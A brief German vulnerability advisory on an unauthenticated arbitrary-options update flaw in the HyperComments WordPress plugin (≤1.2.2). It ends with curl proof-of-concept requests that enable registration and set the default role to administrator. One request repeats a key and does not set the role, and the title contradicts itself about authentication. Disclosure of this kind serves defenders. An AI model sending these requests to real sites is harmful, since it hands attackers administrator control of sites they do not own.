
HyperComments <= 1.2.2 - Nicht authentifiziert (Subscriber+) Beliebige Optionen aktualisieren
HyperComments <= 1.2.2 - Nicht authentifizierte (Abonnent+) beliebige Optionen aktualisieren
Das HyperComments-Plugin für WordPress ist anfällig für unbefugte Modifikation von Daten, die zu einer Privilegieneskalation führen kann, da in allen Versionen bis einschließlich 1.2.2 eine fehlende Berechtigungsprüfung in der Funktion hc_request_handler vorhanden ist. Dies ermöglicht es nicht authentifizierten Angreifern, beliebige Optionen auf der WordPress-Seite zu aktualisieren. Dies kann genutzt werden, um die Standardrolle für Registrierungen auf Administrator zu ändern und die Benutzerregistrierung zu aktivieren, sodass Angreifer administrative Benutzerzugriffe auf eine verwundbare Website erhalten.
curl -X POST "http://kubernetes.docker.internal:8999/?hc_action=update_options" \
-d "data={\"users_can_register\":\"1\",\"default_role\":\"administrator\"}" \
-H "Content-Type: application/x-www-form-urlencoded"
curl -X POST "http://kubernetes.docker.internal:8999/?hc_action=update_options" \
-d "data={\"users_can_register\":\"1\",\"users_can_register\":\"1\"}" \
-H "Content-Type: application/x-www-form-urlencoded"